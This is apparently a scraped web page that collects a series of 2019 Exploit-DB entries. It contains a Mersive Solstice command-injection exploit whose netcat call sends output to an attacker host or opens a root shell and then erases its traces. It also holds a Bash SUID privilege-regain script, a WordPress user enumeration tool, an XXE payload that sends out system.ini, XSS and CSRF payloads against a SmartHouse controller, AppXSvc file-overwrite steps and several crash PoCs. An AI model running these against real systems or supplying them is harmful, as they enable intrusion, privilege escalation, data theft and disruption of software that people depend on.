ISHACK AI BOT

# Exploit Title: Easy-Hide-IP 5.0.0.3 - 'EasyRedirect' Unquoted Service Path # Date: 2019-11-22 # Exploit Author: Rene Cortes S # Vendor Homepage: https://easy-hide-ip.com # Software Link: https://easy-hide-ip.com # Version: 5.0.0.3 # Tested on: Windows 7 Professional Service Pack 1 ########################################################################################################################## Step to discover the unquoted Service: C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ EasyRedirect EasyRedirect C:\Program Files\Easy-Hide-IP\rdr\EasyRedirect.exe Auto ############################################################################################################################################## Service info: C:\Users\user>sc qc EasyRedirect [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: EasyRedirect TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\Easy-Hide-IP\rdr\EasyRedirect.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : EasyRedirect DEPENDENCIAS : RPCSS NOMBRE_INICIO_SERVICIO: LocalSystem #########################################################################################################################

# Exploit Title: Microsoft Windows AppXsvc Deployment Extension - Privilege Escalation # Date: 2019-11-22 # Exploit Author: Abdelhamid Naceri # Vendor Homepage: www.microsoft.com # Tested on: Windows 10 1903 # CVE : CVE-2019-1385 Windows: "AppX Deployment Service" (AppXSVC) elevation of privilege vulnerability Class: Local Elevation of Privileges Description: This Poc is exploiting a vulnerability in (AppXSvc) , abusing this vulnerability could allow an attacker to overwrite\create file as SYSTEM which can result in EOP . The're is 2 way to abuse the issue . Step To Reproduce : [1] For An Arbitrary File Creation 1-Turn %userprofile%\AppData\Local\Microsoft\WindowsApps\Backup Into a Junction To your target directory example "c:\" 2-Open Powershell and execute the command Add-AppxPackage -RegisterByFamilyName -ForceApplicationShutdown -MainPackage Microsoft.MicrosoftEdge_8wekyb3d8bbwe 3-Check the directory the file should be created now 4-Enjoy:) [2] To Overwrite File 1-Create a temp dir in %temp%\ 2-Create a hardlink to your target file in the temp created dir 3-Turn %userprofile%\AppData\Local\Microsoft\WindowsApps\Backup Into a junction to your temp created dir 4-Open Powershell and execute the command Add-AppxPackage -RegisterByFamilyName -ForceApplicationShutdown -MainPackage Microsoft.MicrosoftEdge_8wekyb3d8bbwe 5-Check the file again Limitation : when 'MicrosoftEdge.exe' is created it would inherit the directory permission which mean the file wouldnt be writtable in majority of cases but a simple example of abusement in the directory "c:\" <- the default acl is preventing Athenticated Users from creating file but not modifying them so if we abused the vulnerability in "c:\" we will have an arbitrary file created and also writeable from a normal user . also you cant overwrite file that are not writable by SYSTEM , i didnt make a check in the poc because in if the file is non readable by the current user the check will return false even if the file is writtable by SYSTEM . NOTE : you can also overwrite file which you cant even read them . In the file creation make sure the path is writtable by SYSTEM otherwise the poc will fail . I think 99% of folders are writtable by SYSTEM Platform: This has been tested on a fully patched system (latest patch -> November 2019) : OS Edition: Microsoft Windows 10 Home Os Version: 1903 OS Version Info: 18362.418 Additional Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\BuldLabEx = 18362.1.amd64fre.19h1_release.190318-1202 Expected result: The Deployment Process should fail with "ERROR_ACCESS_IS_DENIED" Observed result : The Deployment Process is overwritting or creating an arbitrary file as "LOCAL SYSTEM" NOTE : It was patched on 7/11/19

# Exploit Title: InduSoft Web Studio 8.1 SP1 - "Atributos" Denial of Service (PoC) # Discovery by: chuyreds # Discovery Date: 2019-11-23 # Vendor Homepage: http://www.indusoft.com/ # Software Link : http://www.indusoft.com/Products-Downloads # Tested Version: 8.1 SP1 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 Pro x64 es # Exploit Title: InduSoft Web Studio 8.1 SP1 - "Atributos" 'No Redibujar'/'Deshabilitados' Denial of Service (PoC) # Discovery by: chuyreds # Google Dork: [email protected]: chuyreds # Discovery Date: 23-11-2019 # Vendor Homepage: http://www.indusoft.com/ # Software Link : http://www.indusoft.com/Products-Downloads # Tested Version: 8.1 SP1 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 Pro x64 es # Steps to Produce the Denial of Service: # 1.- Run python code: InduSoft Web Studio Edition 8.1 SP1.py # 2.- Open InduSoft "Web Studio Edition 8.1 SP1.txt" and copy content to clipboard # 3.- Open InduSoft Web Studio Edition 8.1 SP1 # 4.- On Graficos slect Atributos # 5.- Paste ClipBoard on "No Redibujar"/"Deshabilitados" and click on "Aceptar" #!/usr/bin/env python buffer = "\x41" * 1026 f = open ("InduSoft Web Studio Edition 8.1 SP1.txt", "w") f.write(buffer) f.close()

# VMware Escape Exploit VMware Escape Exploit before VMware WorkStation 12.5.3 Host Target: Win10 x64 Compiler: VS2013 Test on VMware 12.5.2 build-4638234 # Known issues * Failing to heap manipulation causes host process crash. (About 50% successful rate ) * Not quite elaborate because I'm not good at doing heap "fengshui" on winows LFH. # FAQ * Q: Error in reboot vmware after crashing process. * A: Just remove ***.lck** folder in your vm directory or wait a while and have a coffee :).Here is a simple [script](https://raw.githubusercontent.com/unamer/vmware_escape/master/cve-2017-4901/cleanvm.bat) I used to clean up.  # Reference * https://keenlab.tencent.com/en/2018/04/23/A-bunch-of-Red-Pills-VMware-Escapes/ EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47715.zip

# Exploit Title: iNetTools for iOS 8.20 - 'Whois' Denial of Service (PoC) # Discovery by: Ivan Marmolejo # Discovery Date: 2019-11-25 # Vendor Homepage: https://apps.apple.com/mx/app/inettools-ping-dns-port-scan/id561659975 # Software Link: App Store for iOS devices # Tested Version: 8.20 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: iPhone 6s iOS 13.2 # Summary: iNetTools is a suite of network diagnose tools on iPhone and iPad. It provides essential tools such as # Ping, DNS Lookup, Trace Route, Port Scan, Whois, Server Monitor, and Lan Scan. # Steps to Produce the Crash: # 1.- Run python code: iNetTools.py # 2.- Copy content to clipboard # 3.- Open "iNetTools for iOS" # 4.- Go to "Whois" # 5.- Paste ClipBoard on "Domain Name" # 6.- Start # 7.- Crashed #!/usr/bin/env python buffer = "\x41" * 98 print (buffer)

#Exploit Title: Microsoft DirectX SDK 2010 - '.PIXrun' Denial Of Service (PoC) #Exploit Author : ZwX #Exploit Date: 2019-11-26 #Vendor Homepage : https://www.microsoft.com/ #Link Software : https://www.microsoft.com/en-us/download/details.aspx?id=681 #Tested on OS: Windows 7 Proof of Concept (PoC): ======================= 1.Download and install Microsoft DirectX SDK 2.Open the PIX for Windows tools 2.Run the python operating script that will create a file (poc.PIXrun) 3.Run the software "File -> Open File -> Add the file (.PIXrun) " 4.PIX for Windows Crashed #!/usr/bin/python DoS=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01" "\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E" "\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22" "\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41") poc = DoS file = open("poc.PIXrun,"w") file.write(poc) file.close() print "POC Created by ZwX"

#Exploit Title: SpotAuditor 5.3.2 - 'Base64' Denial Of Service (PoC) #Exploit Author : ZwX #Exploit Date: 2019-11-26 #Vendor Homepage : http://www.nsauditor.com/ #Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe #Tested on OS: Windows 7 ''' Proof of Concept (PoC): ======================= 1.Download and install SpotAuditor 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Tools -> Base64 Encrypted Password 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Base64 Encrypted Password' and click on 'Decrypt' 6.SpotAuditor Crashed ''' #!/usr/bin/python http = "http//" buffer = "\x41" * 2000 poc = http + buffer file = open("poc.txt","w") file.write(poc) file.close() print "POC Created by ZwX"

# Exploit Title : Wordpress 5.3 - User Disclosure # Author: SajjadBnd # Date: 2019-11-17 # Software Link: https://wordpress.org/download/ # version : wp < 5.3 # tested on : Ubunutu 18.04 / python 2.7 # CVE: N/A #!/usr/bin/python # -*- coding: utf-8 -*- # import requests import os import re import json import sys import urllib3 def clear(): linux = 'clear' windows = 'cls' os.system([linux, windows][os.name == 'nt']) def Banner(): print(''' - Wordpress < 5.3 - User Enumeration - SajjadBnd ''') def Desc(): url = raw_input('[!] Url >> ') vuln = url + "/wp-json/wp/v2/users/" while True: try: r = requests.get(vuln,verify=False) content = json.loads(r.text) data(content) except requests.exceptions.MissingSchema: vuln = "http://" + vuln def data(content): for x in content: name = x["name"].encode('UTF-8') print("======================") print("[+] ID : " + str(x["id"])) print("[+] Name : " + name) print("[+] User : " + x["slug"]) sys.exit(1) if __name__ == '__main__': urllib3.disable_warnings() reload(sys) sys.setdefaultencoding('UTF8') clear() Banner() Desc() wpuser.txt #!/usr/bin/python # -*- coding: utf-8 -*- # # Exploit Title : Wordpress < 5.3 - User Disclosure # Exploit Author: SajjadBnd # email : [email protected] # Software Link: https://wordpress.org/download/ # version : wp < 5.3 # tested on : Ubunutu 18.04 / python 2.7 import requests import os import re import json import sys import urllib3 def clear(): linux = 'clear' windows = 'cls' os.system([linux, windows][os.name == 'nt']) def Banner(): print(''' - Wordpress < 5.3 - User Enumeration - SajjadBnd ''') def Desc(): url = raw_input('[!] Url >> ') vuln = url + "/wp-json/wp/v2/users/" while True: try: r = requests.get(vuln,verify=False) content = json.loads(r.text) data(content) except requests.exceptions.MissingSchema: vuln = "http://" + vuln def data(content): for x in content: name = x["name"].encode('UTF-8') print("======================") print("[+] ID : " + str(x["id"])) print("[+] Name : " + name) print("[+] User : " + x["slug"]) sys.exit(1) if __name__ == '__main__': urllib3.disable_warnings() reload(sys) sys.setdefaultencoding('UTF8') clear() Banner() Desc()

# Exploit Title: GHIA CamIP 1.2 for iOS - 'Password' Denial of Service (PoC) # Discovery by: Ivan Marmolejo # Discovery Date: 2019-11-27 # Vendor Homepage: https://apps.apple.com/mx/app/ghia-camip/id1342090963 # Software Link: App Store for iOS devices # Tested Version: 1.2 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: iPhone 6s iOS 13.2.3 # Summary: With GHIA CamIP you can view your cameras in real time supports conventional IPC cameras, # cameras with alarm, Video intercom and other devices. # Steps to Produce the Crash: # 1.- Run python code: GHIA.py # 2.- Copy content to clipboard # 3.- Open "GHIA CamIP for iOS" # 4.- Go to "Add" # 5.- Wireless Settings # 6.- Connect to the internet # 7.- Paste Clipboard on "Password" # 8.- WiFi Connection # 9.- Start setting # 10- Crashed #!/usr/bin/env python buffer = "\x41" * 33 print (buffer)

# Exploit Title: Mersive Solstice 2.8.0 - Remote Code Execution # Google Dork: N/A # Date: 2016-12-23 # Exploit Author: Alexandre Teyar # Vendor Homepage: https://www2.mersive.com/ # Firmware Link: http://www.mersive.com/Support/Releases/SolsticeServer/SGE/Android/2.8.0/Solstice.apk # Versions: 2.8.0 # Tested On: Mersive Solstice 2.8.0 # CVE: CVE-2017-12945 # Description : This will exploit an (authenticated) blind OS command injection # vulnerability present in Solstice devices running versions # of the firmware prior to 2.8.4. # Notes : To get the the command output (in piped-mode), a netcat listener # (e.g. 'nc -lkvp <LPORT>') needs to be launched before # running the exploit. # To get an interactive root shell use the following syntax # 'python.exe .\CVE-2017-12945.py -pass <PASSWORD> # -rh <RHOST> -p "busybox nc <LHOST> <LPORT> # -e /system/bin/sh -i"'. #!/usr/bin/env python3 import argparse import logging import requests import sys import time def parse_args(): """ Parse and validate the command line supplied by users """ parser = argparse.ArgumentParser( description="Solstice Pod Blind Command Injection" ) parser.add_argument( "-d", "--debug", dest="loglevel", help="enable verbose debug mode", required=False, action="store_const", const=logging.DEBUG, default=logging.INFO ) parser.add_argument( "-lh", "--lhost", dest="lhost", help="the listening address", required=False, type=str ) parser.add_argument( "-lp", "--lport", dest="lport", help="the listening port - default 4444", required=False, default="4444", type=str ) parser.add_argument( "-p", "--payload", dest="payload", help="the command to execute", required=True, type=str ) parser.add_argument( "-pass", "--password", dest="password", help="the target administrator password", required=False, default="", type=str ) parser.add_argument( "-rh", "--rhost", dest="rhost", help="the target address", required=True, type=str ) return parser.parse_args() def main(): try: args = parse_args() lhost = args.lhost lport = args.lport password = args.password rhost = args.rhost logging.basicConfig( datefmt="%H:%M:%S", format="%(asctime)s: %(levelname)-8s %(message)s", handlers=[logging.StreamHandler()], level=args.loglevel ) # Redirect stdout and stderr to <FILE> # only when the exploit is launched in piped mode if lhost and lport: payload = args.payload + " > /data/local/tmp/rce.tmp 2>&1" logging.info( "attacker listening address: {}:{}".format(lhost, lport) ) else: payload = args.payload logging.info("solstice pod address: {}".format(rhost)) if password: logging.info( "solstice pod administrator password: {}".format(password) ) # Send the payload to be executed logging.info("sending the payload...") send_payload(rhost, password, payload) # Send the results of the payload execution to the attacker # using 'nc <LHOST> <LPORT> < <FILE>' then remove <FILE> if lhost and lport: payload = ( "busybox nc {} {} < /data/local/tmp/rce.tmp ".format( lhost, lport ) ) logging.info("retrieving the results...") send_payload(rhost, password, payload) # Erase exploitation traces payload = "rm -f /data/local/tmp/rce.tmp" logging.info("erasing exploitation traces...") send_payload(rhost, password, payload) except KeyboardInterrupt: logging.warning("'CTRL+C' pressed, exiting...") sys.exit(0) def send_payload(rhost, password, payload): URL = "http://{}/Config/service/saveData".format(rhost) headers = { "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest", "Referer": "http://{}/Config/config.html".format(rhost) } data = { "m_networkCuration": { "ethernet": { "dhcp": False, "staticIP": "; {}".format(payload), "gateway": "", "prefixLength": 24, "dns1": "", "dns2": "" } }, "password": "{}".format(password) } # Debugging using the BurpSuite # proxies = { # 'http': 'http://127.0.0.1:8080', # 'https': 'https://127.0.0.1:8080' # } try: logging.info("{}".format(payload)) response = requests.post( URL, headers=headers, # proxies=proxies, json=data ) logging.debug( "{}".format(response.json()) ) # Wait for the command to be executed time.sleep(2) except requests.exceptions.RequestException as ex: logging.error("{}".format(ex)) sys.exit(0) if __name__ == "__main__": main()

# Exploit Title: Online Inventory Manager 3.2 - Persistent Cross-Site Scripting # Date: 2019-11-29 # Exploit Author: Cemal Cihad ÇİFTÇİ # Vendor Homepage: https://bigprof.com # Software Link : https://bigprof.com/appgini/applications/online-inventory-manager # Software : Online Inventory Manager # Version : 3.2 # Vulernability Type : Cross-site Scripting # Vulenrability : Stored XSS # Tested on: Windows 10 Pro # Stored XSS has been discovered in the Online Inventory Manager created by bigprof/AppGini # editgroups section. In editgroups section # (http://localhost/inventory/admin/pageEditGroup.php?groupID=1). # Payload i used: "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>" # POC: http://localhost/inventory/admin/pageViewGroups.php in this # url you can edit the groups information with pressing onto the group name. After the edit page open # you can enter your payload into the description field. After going back to # the groups page you will see your Javascript code gonna run. # This vulnerability is also exist while you are creating a new group.

#Exploit Title: SpotAuditor 5.3.2 - 'Key' Denial of Service #Exploit Author : ZwX #Exploit Date: 2019-11-28 #Vendor Homepage : http://www.nsauditor.com/ #Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe #Tested on OS: Windows 7 #Social: twitter.com/ZwX2a ''' Proof of Concept (PoC): ======================= 1.Download and install SpotAuditor 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Key' and click on 'Ok' 6.SpotAuditor Crashed ''' #!/usr/bin/python http = "http//" buffer = "\x41" * 2000 poc = http + buffer file = open("poc.txt","w") file.write(poc) file.close() print "POC Created by ZwX"

# Exploit Title: TexasSoft CyberPlanet 6.4.131 - 'CCSrvProxy' Unquoted Service Path # Date: 2019-11-28 # Exploit Author: Cristian Ayala G # Vendor Homepage: https://tenaxsoft.com/index.html # Software Link: https://tenaxsoft.com/descargas.html # Version: 6.4.131 # Tested on: Windows 10 Pro x64 ########################################################################## # Step to discover the unquoted Service: C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr -i "auto" | findstr -i -v "C:\Windows\\ | findstr """ CCSrvProxy CCSrvProxy C:\Program Files (x86)\TenaxSoft\CyberPlanet\SrvProxy.exe Auto Control de impresiones Tenax ControldeImpresiones C:\Program Files (x86)\TenaxSoft\CyberPlanet\TenaxService64.exe Auto ########################################################################## # Service info: C:\Users\user>sc qc CCSrvProxy [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: CCSrvProxy TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\TenaxSoft\CyberPlanet\SrvProxy.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : CCSrvProxy DEPENDENCIAS : Spooler NOMBRE_INICIO_SERVICIO: LocalSystem ##########################################################################

# Exploit Title: Nsauditor 3.1.8.0 - 'Name' Denial of Service (PoC) # Discovery by: SajjadBnd # Date: 2019-11-30 # Vendor Homepage: http://www.nsauditor.com # Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe # Tested Version: 3.1.8.0 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 - Pro # About App # Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks and hosts for vulnerabilities, # and to provide security alerts.Nsauditor network auditor checks enterprise network for all potential methods that # a hacker might use to attack it and create a report of potential problems that were found , Nsauditor network auditing # software significantly reduces the total cost of network management in enterprise environments by enabling # IT personnel and systems administrators gather a wide range of information from all the computers in the network without # installing server-side applications on these computers and create a report of potential problems that were found. # PoC # 1.Run the python script, it will create a new file "dos.txt" # 3.Run Nsauditor and click on "Register -> Enter Registration Code" # 2.Paste the content of dos.txt into the Field: 'Name' # 6.click 'ok' # 5.Crashed ;) #!/usr/bin/env python buffer = "\x41" * 1000 try: f=open("dos.txt","w") print "[+] Creating %s bytes DOS payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"

# Exploit Title : Bash 5.0 Patch 11 - SUID Priv Drop Exploit # Date : 2019-11-29 # Original Author: Ian Pudney , Chet Ramey # Exploit Author : Mohin Paramasivam (Shad0wQu35t) # Version : < Bash 5.0 Patch 11 # Tested on Linux # Credit : Ian Pudney from Google Security and Privacy Team based on Google CTF suidbash # CVE : 2019-18276 # CVE Link : https://nvd.nist.gov/vuln/detail/CVE-2019-18276 , https://www.youtube.com/watch?v=-wGtxJ8opa8 # Exploit Demo POC : https://youtu.be/Dbwvzbb38W0 Description : An issue was discovered in disable_priv_mode in shell.c in GNU Bash through 5.0 patch 11. By default, if Bash is run with its effective UID not equal to its real UID, it will drop privileges by setting its effective UID to its real UID. However, it does so incorrectly. On Linux and other systems that support "saved UID" functionality, the saved UID is not dropped. An attacker with command execution in the shell can use "enable -f" for runtime loading of a new builtin, which can be a shared object that calls setuid() and therefore regains privileges. However, binaries running with an effective UID of 0 are unaffected. #!/bin/bash #Terminal Color Codes RED='\033[0;31m' GREEN='\033[0;32m' NC='\033[0m' #Get the Effective User ID (owner of the SUID /bin/bash binary) read -p "Please enter effective user id (euid) : " euid #Create a C file and output the exploit code touch pwn.c echo "" > pwn.c cat <<EOT >> pwn.c #include <sys/types.h> #include <unistd.h> #include <stdio.h> void __attribute((constructor)) initLibrary(void) { printf("Escape lib is initialized"); printf("[LO] uid:%d | euid:%d%c", getuid(), geteuid()); setuid($euid); printf("[LO] uid%d | euid:%d%c", getuid(), geteuid()); } EOT echo -e "${RED}" echo -e "Exploit Code copied to pwn.c !\n" sleep 5 echo -e "Compiling Exploit Object ! \n" $(which gcc ) -c -fPIC pwn.c -o pwn.o sleep 5 echo -e "Compiling Exploit Shared Object ! \n" $(which gcc ) -shared -fPIC pwn.o -o libpwn.so sleep 5 echo -e "Exploit Compiled ! \n" sleep 5 echo -e "Executing Exploit :) \n" sleep 5 #Execute the Shared Library echo -e "${RED}Run : ${NC} enable -f ./libpwn.so asd \n"

#Exploit Title: SpotAuditor 5.3.2 - 'Name' Denial Of Service #Exploit Author : ZwX #Exploit Date: 2019-11-28 #Vendor Homepage : http://www.nsauditor.com/ #Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe #Tested on OS: Windows 7 #Social: twitter.com/ZwX2a #contact: [email protected] ''' Proof of Concept (PoC): ======================= 1.Download and install SpotAuditor 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Name' and click on 'Ok' 6.SpotAuditor Crashed ''' #!/usr/bin/python http = "http//" buffer = "\x41" * 2000 poc = http + buffer file = open("poc.txt","w") file.write(poc) file.close() print "POC Created by ZwX"

# Exploit Title: Visual Studio 2008 - XML External Entity Injection # Discovery by: hyp3rlinx # Date: 2019-12-02 # Vendor Homepage: www.microsoft.com # Software Link: Visual Studio 2008 Express IDE # Tested Version: 2008 # CVE: N/A [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-VISUAL-STUDIO-EXPRESS-2008-IDE-XML-EXTERNAL-ENTITY-0Day.txt [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Visual Studio 2008 Express IDE vcsetup.exe File hash: 62f764849e8fcdf8bfbc342685641304 Download: http://go.microsoft.com/?linkid=7729279 [Vulnerability Type] XML External Entity Injection 0Day [CVE Reference] N/A [Security Issue] Visual Studio 2008 IDE suffers from XML External Entity injection. Attackers can leverage many file types, some being MASM related files like .asm or .lst. By opening any one of the following file types listed below, it can allow remote attackers to steal files from the victims computer, sending them to the remote attackers server. Double click any of the following extensions and it will trigger the XXE vulnerability. Note, upon installation of the IDE the following file types get associated with Visual Studio 2008 and are ALL vulnerable and will trigger the XXE exploit. [Vuln XXE file types] .snippet .i .s .asm .disco .lst .inc .srf .wsdl .rgs .xml This IDE is pretty old, I know, but its still available for download as of this writing, therefore I release the advisory. [References] https://devblogs.microsoft.com/visualstudio/end-of-support-for-visual-studio-2008-in-one-year/ [Exploit/POC] "Evil.snippet" or any of the extensions mentioned above. <?xml version="1.0"?> <!DOCTYPE knobgobslob [ <!ENTITY % file SYSTEM "C:\Windows\system.ini"> <!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd"> %dtd;]> <pwn>&send;</pwn> "payload.dtd" <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>"> %all; python -m SimpleHTTPServer python -m http.server (Python3) [POC Video URL] https://www.youtube.com/watch?v=QOZlwzsbPrk [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: 3/24/2017 MSRC sent me link to "Definition of a Security Vulnerability" Also Product is also not supported anymore. December 1, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

# Exploit Title: SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery # Discovery by: LiquidWorm # Date: 2019-12-02 # Vendor Homepage: # Tested Version: 6.5.33.17072501 # CVE: N/A # Advisory ID: ZSL-2019-5543 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5543.php Carlo Gavazzi SmartHouse Webapp 6.5.33 CSRF/XSS Vulnerabilities Vendor: Carlo Gavazzi Automation S.p.A Product web page: http://www.gavazzi-automation.com | http://www.smarthouse.nu Affected version: Web-app: 6.5.33.17072501 Web-app: 6.5.32.17062101 Web-app: 6.2.3.16102701 Web-app: 5.5.3.160421101 Web-app: 5.3.3.15120101 Release: 1.0.5.1 Release: 1.0.5.0 Release: 1.0.3.5 Release: 1.0.3.2 Summary: Carlo Gavazzi is an international company that develops, manufactures and sells electrical automation components. Our products are used in industrial automation and real estate automation. Smart-house is based on a system that we have developed and produced since 1986, mainly for industrial-related installations. Our system is present in more than 150,000 installations. For a few years now, we have focused our development on smart electrical installations for home and property automation. Smart-house is currently installed in both villas and commercial properties. Desc: The application suffers from multiple CSRF and XSS vulnerabilities. The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Input passed to several GET/POST parameters is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Apache PHP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2019-5543 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5543.php 01.11.2019 -- Reflected XSS (GET): -------------------- 1. http://192.168.0.24/app/index.php?error=Waddup"><script>confirm(document.cookie)</script> (pre-auth) 2. http://192.168.0.24/app/messagepage.php?msg=<script>confirm(document.cookie)</script> (pre-auth) 3. http://192.168.0.24/app/detaf.php?p=0&l=50"><script>confirm(document.cookie)</script>&f=5658 (post-auth) 4. http://192.168.0.24/app/detaf.php?p=0"><script>confirm(document.cookie)</script>&l=50&f=5658 (post-auth) 5. http://192.168.0.24/?functionsh=list&part[]=fn__intrudermain001&part[]=fn__intrudersec002&name=IntruderMainFunction"><script>confirm(document.cookie)</script>&grpl=1 (post-auth) CSRF set temperature: --------------------- <html> <body> <form action="http://192.168.0.24/app/datasend.php" method="POST"> <input type="hidden" name="IDFunction" value="3875" /> <input type="hidden" name="favorite" value="0" /> <input type="hidden" name="rooms" value="-1" /> <input type="hidden" name="userId" value="-300" /> <input type="hidden" name="heat_ensave_set" value="24" /> <input type="hidden" name="heat_set" value="25.5" /> <input type="submit" value="Set" /> </form> </body> </html> Stored XSS (POST): ------------------ <html> <body> <form action="http://192.168.0.24/app/command.php" method="POST"> <input type="hidden" name="op" value="11" /> <input type="hidden" name="name" value='Graph name"><script>confirm(document.cookie)</script>' /> <input type="hidden" name="period" value="2" /> <input type="hidden" name="gg" value="6" /> <input type="hidden" name="ggf" value="6" /> <input type="hidden" name="mm" value="11" /> <input type="hidden" name="mmf" value="11" /> <input type="hidden" name="aa" value="2019" /> <input type="hidden" name="aaf" value="2019" /> <input type="hidden" name="param" value="[1]" /> <input type="submit" value="Send" /> </form> </body> </html> Reflected XSS (POST): --------------------- <html> <body> <form action="http://192.168.0.24/refresh.php"> <input type="hidden" name="param[0][]" value="switch0251<script>confirm(document.cookie)</script>" /> <input type="hidden" name="param[0][]" value="0251" /> <input type="hidden" name="param[0][]" value="switch" /> <input type="hidden" name="param[1][]" value="switch1250" /> <input type="hidden" name="param[1][]" value="1250" /> <input type="hidden" name="param[1][]" value="switch" /> <input type="submit" value="Send" /> </form> </body> </html>

